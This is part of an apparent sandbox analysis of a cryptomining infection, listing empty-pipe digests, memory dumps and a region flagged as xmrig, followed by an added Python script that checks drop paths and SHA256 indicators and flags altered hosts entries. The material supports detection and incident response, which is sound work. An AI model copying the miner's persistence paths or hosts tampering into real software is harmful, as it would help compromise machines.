\??\PIPE\srvsvc (listed twice, identical)
  MD5:    d41d8cd98f00b204e9800998ecf8427e
  SHA1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
  These are the digests of zero bytes: nothing was captured from the pipe, and these values must not be used as indicators.
-
Memory dumps (name, size):
  memory/112-159-0x0000000000000000-mapping.dmp
  memory/276-94-0x0000000000000000-mapping.dmp
  memory/292-117-0x000000013F9E0000-0x000000014068B000-memory.dmp   12.7MB
  memory/292-152-0x000000013F9E0000-0x000000014068B000-memory.dmp   12.7MB
  memory/320-144-0x0000000000000000-mapping.dmp
  memory/332-145-0x0000000000000000-mapping.dmp
  memory/364-75-0x0000000000000000-mapping.dmp
  memory/572-84-0x0000000000000000-mapping.dmp
  memory/572-135-0x0000000000000000-mapping.dmp
  memory/584-86-0x0000000000000000-mapping.dmp
  memory/784-130-0x0000000000000000-mapping.dmp
  memory/832-131-0x0000000000000000-mapping.dmp
  memory/908-140-0x0000000000000000-mapping.dmp
  memory/996-69-0x0000000000000000-mapping.dmp
  memory/1092-83-0x0000000000000000-mapping.dmp
  memory/1104-139-0x000007FEF30F0000-0x000007FEF3C4D000-memory.dmp   11.4MB
  memory/1104-148-0x0000000001314000-0x0000000001317000-memory.dmp   12KB
  memory/1104-138-0x000007FEF3C50000-0x000007FEF4673000-memory.dmp   10.1MB
  memory/1104-149-0x000000000131B000-0x000000000133A000-memory.dmp   124KB
  memory/1104-133-0x0000000000000000-mapping.dmp
  memory/1108-134-0x0000000000000000-mapping.dmp
  memory/1140-88-0x0000000000000000-mapping.dmp
  memory/1148-141-0x0000000000000000-mapping.dmp
  memory/1164-72-0x0000000000000000-mapping.dmp
  memory/1252-156-0x0000000000000000-mapping.dmp
  memory/1252-70-0x0000000000000000-mapping.dmp
  memory/1260-67-0x0000000002934000-0x0000000002937000-memory.dmp   12KB
  memory/1260-64-0x000007FEF3C50000-0x000007FEF4673000-memory.dmp   10.1MB
  memory/1260-63-0x000007FEFB6A1000-0x000007FEFB6A3000-memory.dmp   8KB
  memory/1260-62-0x0000000000000000-mapping.dmp
  memory/1260-66-0x0000000002934000-0x0000000002937000-memory.dmp   12KB
  memory/1260-65-0x000007FEF30F0000-0x000007FEF3C4D000-memory.dmp   11.4MB
  memory/1260-68-0x000000000293B000-0x000000000295A000-memory.dmp   124KB
  memory/1316-82-0x00000000025F4000-0x00000000025F7000-memory.dmp   12KB
  memory/1316-78-0x000007FEF2750000-0x000007FEF32AD000-memory.dmp   11.4MB
  memory/1316-85-0x000000001B820000-0x000000001BB1F000-memory.dmp   3.0MB
  memory/1316-95-0x00000000025FB000-0x000000000261A000-memory.dmp   124KB
  memory/1316-97-0x00000000025FB000-0x000000000261A000-memory.dmp   124KB
  memory/1316-96-0x00000000025F4000-0x00000000025F7000-memory.dmp   12KB
  memory/1316-77-0x000007FEF32B0000-0x000007FEF3CD3000-memory.dmp   10.1MB
  memory/1316-71-0x0000000000000000-mapping.dmp
  memory/1320-146-0x0000000000000000-mapping.dmp
  memory/1380-92-0x0000000000000000-mapping.dmp
  memory/1396-142-0x0000000000000000-mapping.dmp
  memory/1416-143-0x0000000000000000-mapping.dmp
  memory/1428-91-0x0000000000000000-mapping.dmp
  memory/1480-89-0x0000000000000000-mapping.dmp
  memory/1520-87-0x0000000000000000-mapping.dmp
  memory/1532-114-0x000000013F9E0000-0x000000014068B000-memory.dmp   12.7MB
  memory/1532-112-0x0000000000000000-mapping.dmp
  memory/1532-115-0x000000013F9E0000-0x000000014068B000-memory.dmp   12.7MB
  memory/1532-118-0x000000013F9E0000-0x000000014068B000-memory.dmp   12.7MB
  memory/1532-165-0x0000000076E20000-0x0000000076FC9000-memory.dmp   1.7MB
  memory/1532-116-0x000000013F9E0000-0x000000014068B000-memory.dmp   12.7MB
  memory/1532-119-0x000000013F9E0000-0x000000014068B000-memory.dmp   12.7MB
  memory/1532-120-0x000000013F9E0000-0x000000014068B000-memory.dmp   12.7MB
  memory/1532-121-0x0000000076E20000-0x0000000076FC9000-memory.dmp   1.7MB
  memory/1532-164-0x000000013F9E0000-0x000000014068B000-memory.dmp   12.7MB
  memory/1532-154-0x0000000076E20000-0x0000000076FC9000-memory.dmp   1.7MB
  memory/1532-153-0x000000013F9E0000-0x000000014068B000-memory.dmp   12.7MB
  memory/1604-81-0x0000000076E20000-0x0000000076FC9000-memory.dmp   1.7MB
  memory/1604-56-0x000000013F650000-0x00000001402FB000-memory.dmp   12.7MB
  memory/1604-100-0x000000013F650000-0x00000001402FB000-memory.dmp   12.7MB
  memory/1604-101-0x0000000076E20000-0x0000000076FC9000-memory.dmp   1.7MB
  memory/1604-55-0x000000013F650000-0x00000001402FB000-memory.dmp   12.7MB
  memory/1604-59-0x000000013F650000-0x00000001402FB000-memory.dmp   12.7MB
  memory/1604-58-0x000000013F650000-0x00000001402FB000-memory.dmp   12.7MB
  memory/1604-80-0x000000013F650000-0x00000001402FB000-memory.dmp   12.7MB
  memory/1604-60-0x000000013F650000-0x00000001402FB000-memory.dmp   12.7MB
  memory/1604-54-0x000000013F650000-0x00000001402FB000-memory.dmp   12.7MB
  memory/1604-61-0x0000000076E20000-0x0000000076FC9000-memory.dmp   1.7MB
  memory/1604-57-0x000000013F650000-0x00000001402FB000-memory.dmp   12.7MB
  memory/1612-161-0x0000000000000000-mapping.dmp
  memory/1620-107-0x0000000000000000-mapping.dmp
  memory/1644-157-0x0000000000000000-mapping.dmp
  memory/1752-150-0x0000000000000000-mapping.dmp
  memory/1760-137-0x0000000000000000-mapping.dmp
  memory/1796-109-0x000000000247B000-0x000000000249A000-memory.dmp   124KB
  memory/1796-110-0x000000000247B000-0x000000000249A000-memory.dmp   124KB
  memory/1796-108-0x0000000002474000-0x0000000002477000-memory.dmp   12KB
  memory/1796-106-0x000000001B7A0000-0x000000001BA9F000-memory.dmp   3.0MB
  memory/1796-105-0x000007FEF30F0000-0x000007FEF3C4D000-memory.dmp   11.4MB
  memory/1796-98-0x0000000000000000-mapping.dmp
  memory/1796-104-0x000007FEF3C50000-0x000007FEF4673000-memory.dmp   10.1MB
  memory/1804-76-0x0000000000000000-mapping.dmp
  memory/1824-90-0x0000000000000000-mapping.dmp
  memory/1888-158-0x0000000000000000-mapping.dmp
  memory/1932-147-0x0000000000000000-mapping.dmp
  memory/1952-79-0x0000000000000000-mapping.dmp
  memory/1972-93-0x0000000000000000-mapping.dmp
  memory/1976-151-0x0000000000000000-mapping.dmp
  memory/2012-155-0x00000001400014E0-mapping.dmp
  memory/2040-122-0x0000000000000000-mapping.dmp
  memory/2040-127-0x00000000011B4000-0x00000000011B7000-memory.dmp   12KB
  memory/2040-125-0x000007FEF32B0000-0x000007FEF3CD3000-memory.dmp   10.1MB
  memory/2040-126-0x000007FEF2750000-0x000007FEF32AD000-memory.dmp   11.4MB
  memory/2040-129-0x00000000011BB000-0x00000000011DA000-memory.dmp   124KB
  memory/2040-128-0x00000000011B4000-0x00000000011B7000-memory.dmp   12KB
  memory/2044-163-0x00000001407F25D0-mapping.dmp
  memory/2044-166-0x0000000140000000-0x00000001407F4000-memory.dmp   8.0MB   (region flagged xmrig and upx)
  memory/2044-167-0x00000000000F0000-0x0000000000110000-memory.dmp   128KB
  memory/2044-168-0x0000000140000000-0x00000001407F4000-memory.dmp   8.0MB   (region flagged xmrig and upx)
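Two things in the Downloads list limit hash-only matching: updater.exe is not a byte-identical copy of 11.exe, and the \??\PIPE\srvsvc entries carry the digests of empty input. The host triage script below is an added example, not part of the report: it checks the drop paths the report shows, hashes anything present against the report's SHA256 values (refusing to treat the empty-input digest as a match), and parses a hosts file for entries beyond the Windows defaults. The report records that hosts was rewritten but not its content, so the hosts text in demo() is constructed; the default-entry set and the temporary directory layout are assumptions.

```python
"""Host triage for the artifacts in the Downloads list (added example, not part of the report)."""
import hashlib
import os
import re
import tempfile

# SHA256 values copied from the report. 11.exe and the dropped updater.exe
# differ, so the dropper's hash alone misses the persisted copy.
IOC_SHA256 = {
    "2a52bd1672e345f12e0175bcaec0f9c520c8523d74e576c222a89b7b258f64f2": "11.exe",
    "394ccb1ddb7208fb72d9f0a277c13202f9f2843652287eaa7355d83d88170f14": "updater.exe",
    "8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07": "g.log",
    "3187ae368d15b7a1cfbb7b2c1338464ab40586b9432b6b4d259c67e0e9fe9d7e": "hosts",
}
# Digest of zero bytes; the report's \??\PIPE\srvsvc entries carry it and it
# must never be used as an indicator.
EMPTY_SHA256 = hashlib.sha256(b"").hexdigest()

# Paths the report shows being created, relative to the system drive root.
DROP_PATHS = [
    r"Program Files\Google\Chrome\updater.exe",
    r"Program Files\Google\Libs\WR64.sys",
    r"Program Files\Google\Libs\g.log",
    r"Windows\system32\drivers\etc\hosts",
]
# Assumption: only the loopback names ship with Windows; anything else in hosts is reported.
DEFAULT_HOSTS = {("127.0.0.1", "localhost"), ("::1", "localhost")}


def sha256_file(path, chunk=1 << 20):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def classify(digest):
    """Label for a digest: IOC name, the empty-file marker, or None."""
    if digest == EMPTY_SHA256:
        return "empty-file (not an indicator)"
    return IOC_SHA256.get(digest)


def parse_hosts(text):
    """(ip, hostname) pairs, one per hostname, with comments and blank lines dropped."""
    pairs = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = re.split(r"\s+", line)
        pairs.extend((ip, n.lower()) for n in names)
    return pairs


def non_default_hosts(text):
    return [p for p in parse_hosts(text) if p not in DEFAULT_HOSTS]


def triage(root):
    """Findings keyed by drop path for every listed artifact present under root."""
    findings = {}
    for rel in DROP_PATHS:
        path = os.path.join(root, *rel.split("\\"))
        if not os.path.isfile(path):
            continue
        entry = {"sha256": sha256_file(path)}
        entry["ioc"] = classify(entry["sha256"])
        if rel.endswith("hosts"):
            with open(path, encoding="utf-8", errors="replace") as f:
                entry["extra_hosts"] = non_default_hosts(f.read())
        findings[rel] = entry
    return findings


def demo():
    """Constructed tree: a rewritten hosts file plus an empty g.log (content is made up)."""
    root = tempfile.mkdtemp()
    etc = os.path.join(root, "Windows", "system32", "drivers", "etc")
    libs = os.path.join(root, "Program Files", "Google", "Libs")
    os.makedirs(etc)
    os.makedirs(libs)
    with open(os.path.join(etc, "hosts"), "w", encoding="utf-8") as f:
        f.write("# Copyright (c) 1993-2009 Microsoft Corp.\n"
                "127.0.0.1       localhost\n"
                "::1             localhost\n"
                "0.0.0.0   pool.example.test   # constructed entry\n"
                "127.0.0.1 update.example.test\tdownload.example.test\n")
    with open(os.path.join(libs, "g.log"), "wb"):
        pass
    return triage(root)


if __name__ == "__main__":
    for rel, entry in demo().items():
        print(rel, entry)
```

Run it against a mounted image or a live system drive by calling triage() with that root; a g.log that hashes to the report's value tells you the same GPU inventory string was captured, while a hosts file with extra entries is worth reading in full even when its hash does not match, since the content will differ per victim.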